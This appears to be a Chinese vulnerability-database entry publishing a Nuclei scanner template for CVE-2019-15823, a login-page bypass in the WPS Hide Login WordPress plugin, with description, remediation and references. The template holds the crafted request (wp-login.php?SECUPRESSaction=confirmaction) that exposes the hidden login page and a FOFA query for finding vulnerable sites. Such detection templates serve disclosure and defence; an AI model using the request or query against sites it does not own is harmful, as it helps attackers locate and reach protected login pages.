漏洞描述
WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
CVE-2019-15823: WPS Hide Login <= 1.5.2.2 - Login Page Bypass
PoC代码[已公开]
id: CVE-2019-15823
info:
name: WPS Hide Login <= 1.5.2.2 - Login Page Bypass
author: pussycat0x
severity: high
description: |
WPS-Hide-Login plugin before 1.5.3 for WordPress contains an action=confirmaction protection bypass, letting attackers bypass security checks, exploit requires sending crafted requests.
impact: |
Attackers can bypass login protection, potentially leading to unauthorized access.
remediation: |
Update to version 1.5.3 or later.
reference:
- https://web.archive.org/web/20230601185557/https://secupress.me/blog/wps-hide-login-v1-5-2-2-multiples-vulnerabilities/
- https://web.archive.org/web/20230711062924/https://wpscan.com/vulnerability/9469/
metadata:
max-request: 2
verified: true
fofa-query: body="/wp-content/plugins/wps-hide-login"
vendor: wpserveur
product: wps-hide-login
tags: cve,cve2019,wordpress,wp-plugin,wp,disclosure,wps-hide-login,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers:
- type: word
part: response
words:
- "wps-hide"
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-login.php?SECUPRESSaction=confirmaction"
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Username or Email Address</label>')"
- "contains(body, 'wp-login-lost-password')"
condition: and
# digest: 4a0a00473045022033aa8639fd9469a32da2ea8b728901eedb80aa49c641c417cf96d67cde737935022100f4d530c2b89ce82d52b09f24863a826c6ac4bbc8916cf2f7001e199306276607:922c64590222798bb761d5b6d8e72950